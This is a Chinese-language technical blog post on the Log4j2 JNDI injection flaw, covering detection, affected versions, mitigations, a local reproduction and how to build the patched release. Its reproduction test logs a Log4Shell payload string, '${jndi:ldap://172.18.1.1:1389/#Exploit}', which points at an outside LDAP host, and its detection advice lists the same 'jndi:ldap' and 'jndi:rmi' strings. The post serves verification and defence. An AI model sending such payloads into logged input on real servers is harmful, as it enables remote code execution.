log4j关于JNDI注入漏洞验证及修复
一、漏洞说明
漏洞原理官方表述:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替换成任何攻击命令,并且执行。
二、漏洞检测方案
1、通过流量监测设备监控是否有相关 DNSLog 域名的请求
2、通过监测相关日志中是否存在“jndi:ldap://”、“jndi:rmi”等字符来发现可能的攻击行为。
三、影响范围
Apache log4j2 >= 2.0, <= 2.14.1
四、影响组件
Apache Struts2
Apache Solr
Apache Druid
Apache Flink
Apache Flume
Apache Dubbo
Apache Kafka
Sping-boot-strater-loj2
ElasticSearch
Redis
Logstash
五、彻底解决方案(附升级包下载地址)
目前rc1版本已被绕过,建议使用如下官方临时补丁进行修复,升级至log4j-2.15.0-rc2;
升级包下载:log4j-2.15.0-rc2.zip
六、临时缓解方案
1、 禁止没有必要的业务访问外网。
2、设置jvm参数
“-Dlog4j2.formatMsgNoLookups=true”
3、设置
“log4j2.formatMsgNoLookups=True”
4、系统环境变量
“FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS”设置为“true”
七、漏洞复现
1、新建maven工程
2、pom文件内容如下
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>log4j-test</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
<log4j.version>2.14.1</log4j.version>
</properties>
<dependencies>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>${log4j.version}</version>
<scope>compile</scope>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>${log4j.version}</version>
<scope>compile</scope>
<exclusions>
<exclusion>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>RELEASE</version>
<scope>test</scope>
</dependency>
</dependencies>
</project>
3、新建测试类
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.junit.Test;
import java.io.IOException;
public class Log4jTest {
private static final Logger log = LogManager.getLogger();
@Test
public void test() throws IOException {
log.error("${jndi:ldap://172.18.1.1:1389/#Exploit}");
log.error("${}", "jndi:ldap://172.18.1.1:1389/#Exploit");
}
}
4、启动wireshare,下载地址:https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.6.0.exe
若存在漏洞,则将捕获到如下信息。如果不存在漏洞,而无信息。
八、本地编译log4j-2.15.0-rc版本方法
1、下载源码
https://github.com/apache/logging-log4j2/archive/refs/tags/log4j-2.15.0-rc2.zip
2、安装JDK8、9、11。
注意:要3个都装上,并且当前使用的JDK要设置成Java8,可以执行java -version和javac -version验证一下。
我开始只装了8,不成功,提示需要9,然后后来装了9,还是不行,提示还需要11,最后装了11才在JDK环境上
3、用idea打开源码
4、修改toolchains-sample-win.xml文件的JDK安装路径
<?xml version="1.0" encoding="UTF8"?>
<!--
~ Licensed to the Apache Software Foundation (ASF) under one or more
~ contributor license agreements. See the NOTICE file distributed with
~ this work for additional information regarding copyright ownership.
~ The ASF licenses this file to You under the Apache license, Version 2.0
~ (the "License"); you may not use this file except in compliance with
~ the License. You may obtain a copy of the License at
~
~ http://www.apache.org/licenses/LICENSE-2.0
~
~ Unless required by applicable law or agreed to in writing, software
~ distributed under the License is distributed on an "AS IS" BASIS,
~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
~ See the license for the specific language governing permissions and
~ limitations under the license.
-->
<toolchains>
<!-- JDK toolchains -->
<!--<toolchain>
<type>jdk</type>
<provides>
<version>1.7</version>
<vendor>sun</vendor>
</provides>
<configuration>
<jdkHome>C:\Program Files\Java\jdk1.7.0_80</jdkHome>
</configuration>
</toolchain>-->
<toolchain>
<type>jdk</type>
<provides>
<version>1.8</version>
<vendor>sun</vendor>
</provides>
<configuration>
<jdkHome>D:\Program Files\Java\jdk1.8.0_301</jdkHome>
</configuration>
</toolchain>
<toolchain>
<type>jdk</type>
<provides>
<version>9</version>
<vendor>sun</vendor>
</provides>
<configuration>
<jdkHome>D:\Program Files\Java\jdk-9.0.4</jdkHome>
</configuration>
</toolchain>
<toolchain>
<type>jdk</type>
<provides>
<version>11</version>
<vendor>oracle</vendor>
</provides>
<configuration>
<jdkHome>D:\Program Files\Java\jdk-11.0.13</jdkHome>
</configuration>
</toolchain>
<!-- other toolchains -->
</toolchains>
5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
<!--
| This is the toolchains file for Maven. It can be specified at two levels:
|
| 1. User Level. This toolchains.xml file provides configuration for a single user,
| and is normally provided in ${user.home}/.m2/toolchains.xml.
|
| NOTE: This location can be overridden with the CLI option:
|
| -t /path/to/user/toolchains.xml
|
| 2. Global Level. This toolchains.xml file provides configuration for all Maven
| users on a machine (assuming they're all using the same Maven
| installation). It's normally provided in
| ${maven.conf}/toolchains.xml.
|
| NOTE: This location can be overridden with the CLI option:
|
| -gt /path/to/global/toolchains.xml
|
| The sections in this sample file are intended to give you a running start at
| getting the most out of your Maven installation.
|-->
<toolchains xmlns="http://maven.apache.org/TOOLCHAINS/1.1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/TOOLCHAINS/1.1.0 http://maven.apache.org/xsd/toolchains-1.1.0.xsd">
<!--
| With toolchains you can refer to installations on your system. This
| way you don't have to hardcode paths in your pom.xml.
|
| Every toolchain consist of 3 elements:
| * type: the type of tool. An often used value is 'jdk'. Toolchains-aware
| plugins should document which type you must use.
|
| * provides: A list of key/value-pairs.
| Based on the toolchain-configuration in the pom.xml Maven will search for
| matching <provides/> configuration. You can decide for yourself which key-value
| pairs to use. Often used keys are 'version', 'vendor' and 'arch'. By default
| the version has a special meaning. If you configured in the pom.xml '1.5'
| Maven will search for 1.5 and above.
|
| * configuration: Additional configuration for this tool.
| Look for documentation of the toolchains-aware plugin which configuration elements
| can be used.
|
| See also https://maven.apache.org/guides/mini/guide-using-toolchains.html
|
| General example
<toolchain>
<type/>
<provides>
<version>1.0</version>
</provides>
<configuration/>
</toolchain>
| JDK examples
<toolchain>
<type>jdk</type>
<provides>
<version>1.5</version>
<vendor>sun</vendor>
</provides>
<configuration>
<jdkHome>/path/to/jdk/1.5</jdkHome>
</configuration>
</toolchain>
<toolchain>
<type>jdk</type>
<provides>
<version>1.6</version>
<vendor>sun</vendor>
</provides>
<configuration>
<jdkHome>/path/to/jdk/1.6</jdkHome>
</configuration>
</toolchain>
-->
<toolchain>
<type>jdk</type>
<provides>
<version>11</version>
<vendor>oracle</vendor>
</provides>
<configuration>
<jdkHome>D:\Program Files\Java\jdk-11.0.13</jdkHome>
</configuration>
</toolchain>
</toolchains>
6、编译安装到本地仓库
执行mvn clean install -t ./toolchains-sample-win.xml -Dmaven.test.skip=true -f pom.xml编译和安装到本地仓库。
3364
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
